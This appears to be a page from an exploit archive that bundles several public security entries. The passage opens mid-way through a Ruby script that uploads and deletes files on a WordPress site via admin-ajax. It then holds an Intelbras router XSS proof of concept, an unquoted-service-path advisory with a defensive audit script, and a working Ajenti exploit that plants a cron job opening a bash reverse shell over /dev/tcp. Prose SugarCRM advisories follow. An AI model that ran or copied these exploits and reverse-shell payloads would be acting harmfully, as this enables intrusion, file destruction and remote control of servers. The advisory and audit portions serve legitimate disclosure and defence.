'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => global_cookie,
'X_FILENAME' => file_names[$i],
'X-FILENAME' => file_names[$i],
'Connection' => 'close'

}

http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path, headers)
request.body = File.read("post_file")
response = http.request request

$i = $i +1
end

execute_delete_request file_names,global_cookie,amount.to_i

puts "Finished.........."

end

def execute_delete_request (file_names,cookies,rounds )

  $i = 0

  while $i <= file_names.length-1

    puts "Starting the Attack on file No #{$i.to_s} ".green

    uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
    headers =
    {
      'Referer' => 'From The Sky',
      'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
      'Accept' => '*/*',
      'Accept-Language' => 'en-US,en;q=0.5',
      'X-Requested-With'=> 'XMLHttpRequest',
      'Cookie' => cookies,
      'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept-Encoding' => 'gzip, deflate',
      'Connection' => 'close'
    }

    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https'
    request = Net::HTTP::Post.new(uri.path,headers)
    request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
    response = http.request(request)

    if $i != 0
      puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
    end
    $i = $i +1

  end

  send_checks file_names

end


start_function()

Intelbras Router WRN150 1.0.18 Cross Site Scripting


Intelbras Router WRN150 version 1.0.18 suffers from a persistent cross site scripting vulnerability.


MD5 | 184adef8a546b8c86864a291da61497c

# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
# Date: 2019-10-03
# Exploit Author: Prof. Joas Antonio
# Vendor Homepage: https://www.intelbras.com/pt-br/
# Software Link: http://en.intelbras.com.br/node/25896
# Version: 1.0.18
# Tested on: Windows
# CVE : CVE-2019-17411

# PoC 1:

1) Login to your router

2) After signing in, go to WAN Settings

3) Select PPPoE mode

4) In the Service Name and Server Name field, enter any of these payloads:

<script> alert ("Hacked") </script>

<script> alert (1) </script>

# PoC burp.txt

POST /goform/AdvSetWan HTTP/1.1
Host: TARGET
Content-Length: 281
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://TARGET/wan_connected.asp
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt
Connection: close


National Instruments Circuit Design Suite 14.0 Privilege Escalation


National Instruments Circuit Design Suite version 14.0 suffers from a local privilege escalation vulnerability.


MD5 | 98aa4b631011caf494a631d35959d1da

# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
# Discovery Date: 2019-10-10
# Exploit Author: Ivan Marmolejo
# Vendor Homepage: http://www.ni.com/en-us.html
# Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite
# Version: 14.0
# Vulnerability Type: Local
# Tested on: Windows 10 Pro x64 Esp
# Version: 10.0.18362

# Exploit.txt

##############################################################################################################################################

Summary: Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design, simulation,
validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive
SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers
advanced simulation capabilities to give you a clear view of how circuits perform in any situation.

Description: The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an
authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
of the application.


##############################################################################################################################################

Steps to discover the unquoted service:


C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """


NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto


##############################################################################################################################################

Service info:


C:\Users\user>sc qc NiSvcLoc

[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: NiSvcLoc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NI Service Locator
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

##############################################################################################################################################
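
The check above, as an added example that is not part of the original advisory: a small Python audit that takes service ImagePath strings, flags unquoted paths containing spaces, lists the intermediate file names that must not exist (and whose parent directories must not be writable by unprivileged users), and produces the quoted value to write back. The function names and the two contrast entries in the inventory are assumptions made for illustration; only the NiSvcLoc path comes from the output above.

```python
import re

# End of the executable inside an unquoted ImagePath: ".exe" followed by
# whitespace or end of string.
_EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def audit_image_path(image_path):
    """Return None when the path is quoted or has no space before the
    executable name; otherwise return a finding dict."""
    raw = image_path.strip()
    if raw.startswith('"'):
        return None                      # already quoted
    match = _EXE_END.search(raw)
    if match is None:
        return None                      # e.g. driver paths; not classified here
    exe = raw[:match.end()]
    args = raw[match.end():].strip()
    if " " not in exe:
        return None                      # nothing ambiguous to resolve
    # Each space is a point where Windows may treat the prefix as the program
    # name. These files should not exist, and their parent directories should
    # not be writable by unprivileged users.
    audit_paths = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    fixed = '"' + exe + '"' + (" " + args if args else "")
    return {"exe": exe, "args": args, "audit_paths": audit_paths, "fixed": fixed}


# Constructed inventory: the NiSvcLoc value is the one shown above, the other
# two entries are made up for contrast.
SERVICES = {
    "NiSvcLoc": r"C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s",
    "QuotedSvc": r'"C:\Program Files\Example Vendor\svc.exe" --run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
}


def audit_services(services):
    """Map service name -> finding for every service that needs fixing."""
    findings = {}
    for name, image_path in services.items():
        finding = audit_image_path(image_path)
        if finding is not None:
            findings[name] = finding
    return findings


if __name__ == "__main__":
    for name, finding in audit_services(SERVICES).items():
        print(name, "->", finding["fixed"])
        for path in finding["audit_paths"]:
            print("   must not exist:", path)
```
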

Ajenti Remote Command Execution


Ajenti suffers from a remote command execution vulnerability.


MD5 | c3195f6f5b98ff268d1f6b4de8641059

#!/usr/bin/python
# ajentix.py
#
# Ajenti Remote Command Execution Exploit
#
# Jeremy Brown [jbrown3264/gmail] @ Oct 2019
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS.
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
# PID TTY TIME CMD
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ? 00:00:00 sh
# 18851 ? 00:00:00 bash
# 18859 ? 00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
#
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#

import os
import sys
import ssl
import json
import urllib.request as request

def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
        print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
        print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
        return

    host = sys.argv[1]
    opt = sys.argv[2]

    if(opt == 'shell'):
        if(len(sys.argv) < 4):
            print("Error: need another arg for shell")
            return

        ip = sys.argv[3]

        shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\"> /tmp/cronx; crontab /tmp/cronx`"

    body = json.dumps({'username':shell, 'password':'test', 'mode':'normal'})
    byte = body.encode('utf-8')

    url = "https://" + host + ":8000" + "/api/core/auth"

    try:
        req = request.Request(url)

        req.add_header('Content-Type', 'application/json; charset=utf-8')
        req.add_header('Content-Length', len(byte))

        request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert

    except Exception as error:
        print("Error: %s" % error)
        return

    print("Done!")


if(__name__ == '__main__'):
    main()
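
The exec-notify trace in the header shows the username ending up inside a `/bin/sh -c` string. The added example below (not Ajenti's code and not the content of its fix commit) reproduces that pattern next to a shell-free form, with `echo` standing in for the `/bin/su -c "/bin/echo SUCCESS" - <user>` call; the function names and the username policy are assumptions made for illustration.

```python
import re
import subprocess

# Assumed policy for illustration: conservative POSIX-style account names.
# A leading "-" is excluded so the value can never be read as an option.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def check_shell_string(username):
    """Vulnerable pattern: the username is pasted into a /bin/sh -c string,
    so backticks and $(...) are expanded by the shell before the command runs."""
    cmd = "echo SUCCESS - " + username
    out = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True)
    return out.stdout.strip()


def check_argv(username):
    """No shell involved: the username is a single argv element and reaches
    the program byte for byte, whatever characters it contains."""
    out = subprocess.run(["echo", "SUCCESS", "-", username],
                         capture_output=True, text=True)
    return out.stdout.strip()


def check_hardened(username):
    """Defence in depth: reject anything that is not a plain account name,
    then use the argv form."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username rejected")
    return check_argv(username)


# Constructed input with the same shape as the `id` value in the trace above,
# using a harmless echo so the result is deterministic.
SAMPLE = "`echo INJECTED`"

if __name__ == "__main__":
    print("shell string:", check_shell_string(SAMPLE))
    print("argv list   :", check_argv(SAMPLE))
    try:
        check_hardened(SAMPLE)
    except ValueError as err:
        print("hardened    :", err)
```
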

SugarCRM 9.0.1 Cross Site Scripting


SugarCRM versions 9.0.1 and below suffer from multiple reflective cross site scripting vulnerabilities.


MD5 | a36ef60c0e8d40f91c64cce4c99d669a

-------------------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Reflected Cross-Site Scripting Vulnerabilities
-------------------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through the "form" parameter when handling the "Popup"
action within the "DataSets" module is not properly sanitized before being
used to generate HTML output. This can be exploited by malicious users to
carry out Reflected Cross-Site Scripting (XSS) attacks.

2) User input passed through the "name" parameter when handling the "Popup"
action within the "DataSets" module is not properly sanitized before being
used to generate HTML output. This can be exploited by malicious users to
carry out Reflected Cross-Site Scripting (XSS) attacks.

3) User input passed through the "type" parameter when handling the
"dupcheck" action within the "Import" module is not properly sanitized
before being used to generate HTML output. This can be exploited by
malicious users to carry out Reflected Cross-Site Scripting (XSS) attacks.

4) User input passed through the "message" parameter when handling the
"error" action within the "Import" module is not properly sanitized before
being used to generate HTML output. This can be exploited by malicious
users to carry out Reflected Cross-Site Scripting (XSS) attacks.

5) User input passed through the "direct_step" parameter when handling the
"WizardNewsletter" action within the "Campaigns" module is not properly
sanitized before being used to generate HTML output. This can be exploited
by malicious users to carry out Reflected Cross-Site Scripting (XSS)
attacks.

6) User input passed through the "iframe_type" parameter when handling the
"IframeDropdown" action within the "WorkFlow" module is not properly
sanitized before being used to generate HTML output. This can be exploited
by malicious users to carry out Reflected Cross-Site Scripting (XSS)
attacks.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-03


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes



SugarCRM 9.0.1 SQL Injection


SugarCRM versions 9.0.1 and below suffer from multiple remote SQL injection vulnerabilities.


MD5 | d7d53f88e5bd5cf9486ffe6a36ff47b3

--------------------------------------------------------
SugarCRM <= 9.0.1 Multiple SQL Injection Vulnerabilities
--------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed to the "/pmse_Inbox/changeCaseUser" REST API endpoint
is not properly sanitized before being used to construct a SQL query. This
can be exploited by malicious users to e.g. read sensitive data from the
database through in-band SQL Injection attacks.

2) User input passed to the "/pmse_Project/CrmData/activities" REST API
endpoint is not properly sanitized before being used to construct a SQL
query. This can be exploited by malicious users to e.g. read sensitive data
from the database through in-band SQL Injection attacks.

3) User input passed to the "/pmse_Project/CrmData/emails" REST API
endpoint is not properly sanitized before being used to construct a SQL
query. This can be exploited by malicious users to e.g. read sensitive data
from the database through in-band SQL Injection attacks.

4) User input passed to the "/pmse_Project/CrmData/emailtemplates" REST API
endpoint is not properly sanitized before being used to construct a SQL
query. This can be exploited by malicious users to e.g. read sensitive data
from the database through in-band SQL Injection attacks.

5) User input passed to the "/pmse_Project/CrmData/users" REST API endpoint
is not properly sanitized before being used to construct a SQL query. This
can be exploited by malicious users to e.g. read sensitive data from the
database through in-band SQL Injection attacks.

6) User input passed through the "pro_module" JSON parameter to the
"/pmse_Project/CrmData/putData" REST API endpoint is not properly sanitized
before being used to construct a SQL query. This can be exploited by
malicious users to e.g. read sensitive data from the database through
time-based Blind SQL Injection attacks.

7) User input passed through the "cas_id" and "cas_index" parameters to the
"/pmse_Project/CrmData/validateReclaimCase" REST API endpoint is not
properly sanitized before being used to construct a SQL query. This can be
exploited by malicious users to e.g. read sensitive data from the database
through time-based Blind SQL Injection attacks.

8) The vulnerability exists because the "/modules/Emails/Grab.php" script
is using the "group_id" field of an "InboundEmail" bean to construct a SQL
query without being properly sanitized, and such value can be arbitrarily
manipulated through the MergeRecords module. This can be exploited by
malicious users to e.g. read sensitive data from the database through
boolean-based second-order SQL Injection attacks.

9) The vulnerability exists because the "/[module]/export" REST API
endpoint is using a value that can be arbitrarily manipulated through the
"/[module]/record_list" endpoint to construct a SQL query without being
properly sanitized. This can be exploited by malicious users to e.g. read
sensitive data from the database through in-band second-order SQL Injection
attacks.

10) User input passed through the "order_by" parameter to the
"/link/history" REST API endpoint is not properly sanitized before being
used to construct a SQL query. This can be exploited by malicious users to
e.g. read sensitive data from the database through time-based Blind SQL
Injection attacks.

11) The vulnerability exists because the
"PersonFormBase::checkForDuplicates()" method is using certain POST
parameters to construct a SQL query without being properly sanitized. This
can be exploited by malicious users to e.g. read sensitive data from the
database through time-based SQL Injection attacks.

12) User input passed through the "act_name" JSON parameter to the
"/pmse_Inbox" REST API endpoint is not properly sanitized before being used
to construct a SQL query. This can be exploited by malicious users to e.g.
read sensitive data from the database through time-based Blind SQL
Injection attacks.

13) User input passed to the "/pmse_Inbox/processUsersChart" REST API
endpoint is not properly sanitized before being used to construct a SQL
query. This can be exploited by malicious users to e.g. read sensitive data
from the database through in-band SQL Injection attacks. Successful
exploitation of this vulnerability requires a user account with
Admin/Developer access to the "Processes" module.

14) User input passed through the "deal_tot_discount_percentage" JSON
parameter to the "/Quotes" REST API endpoint is not properly sanitized
before being used to construct a SQL query. This can be exploited by
malicious users to e.g. read sensitive data from the database through
time-based Blind SQL Injection attacks.

15) User input passed through the "q" parameter to the
"/pmse_Inbox/unattendedCases" REST API endpoint is not properly sanitized
before being used to construct a SQL query. This can be exploited by
malicious users to e.g. read sensitive data from the database through
in-band SQL Injection attacks. Successful exploitation of this
vulnerability requires a user account with Admin/Developer access to the
"Processes" module.

16) User input passed to the "/pmse_Inbox/userListByTeam" REST API endpoint
is not properly sanitized before being used to construct a SQL query. This
can be exploited by malicious users to e.g. read sensitive data from the
database through in-band SQL Injection attacks.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-04


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes



SugarCRM 9.0.1 Broken Access Controls


SugarCRM versions 9.0.1 and below suffer from multiple broken access control vulnerabilities.


MD5 | 1168050e8aead52cc4050329687aece7

----------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Broken Access Control Vulnerabilities
----------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) There is a Broken Access Control vulnerability with regards to the
"InboundEmail" module. When handling the "Save" action the application
fails to properly check whether the user has Admin access to the module,
thus allowing any user to create a new "InboundEmail" bean regardless of
their roles/permissions.

2) There is a Broken Access Control vulnerability with regards to the
"Trackers" module. When handling the "trackersettings" action the
application fails to properly check whether the user has Admin access to
the module, thus allowing any user to change Trackers' settings regardless
of their roles/permissions.

3) There is a Broken Access Control vulnerability with regards to the
"Campaigns" module. When handling the "WizardEmailSetupSave" action the
application fails to properly check whether the user has Admin access to
the module, thus allowing any user to change Email Setup for Campaigns
regardless of their roles/permissions.

4) There is a Broken Access Control vulnerability with regards to the
"ModuleBuilder" module. When the "view_module" parameter is set to an empty
string, the application fails to properly check whether the user has
permissions to access the module, thus allowing any user to access certain
ModuleBuilder actions regardless of their roles.

5) There is a Broken Access Control vulnerability with regards to the
"Administration" module. When handling the "SaveMerge" action within the
"MergeRecords" module the application fails to properly check whether the
user is a System Administrator, thus allowing unauthorized users to inject
arbitrary "Administration" beans (which means arbitrary values into the
"config" database table). Successful exploitation of this vulnerability
requires a user account with Developer access to any module.

6) There is a Broken Access Control vulnerability with regards to the
"Administration" module. When handling the "Save" action within the
"EmailMan" module the application allows unauthorized users to modify
administration settings by invoking the "Administration::saveConfig()"
method. Successful exploitation of this vulnerability requires a user
account with Developer access to the Emails or Campaigns modules.

7) There is a Broken Access Control vulnerability with regards to the
"Administration" module. When handling the "WizardEmailSetupSave" action
within the "Campaigns" module the application allows unauthorized users to
modify administration settings by invoking the
"Administration::saveConfig()" method.

8) There is a Local File Inclusion vulnerability within the
"add_to_prospect_list" function. User input passed through the
"parent_module" and "parent_type" parameters is not properly sanitized
before being used in a call to the include() function. This can be
exploited to include arbitrary .php files within the webroot and
potentially bypass authorization mechanisms (for instance, by setting the
"parent_module" parameter to "Administration" and the "parent_type"
parameter to "expandDatabase" or any other action which does not implement
ACL checks).


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-05


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes


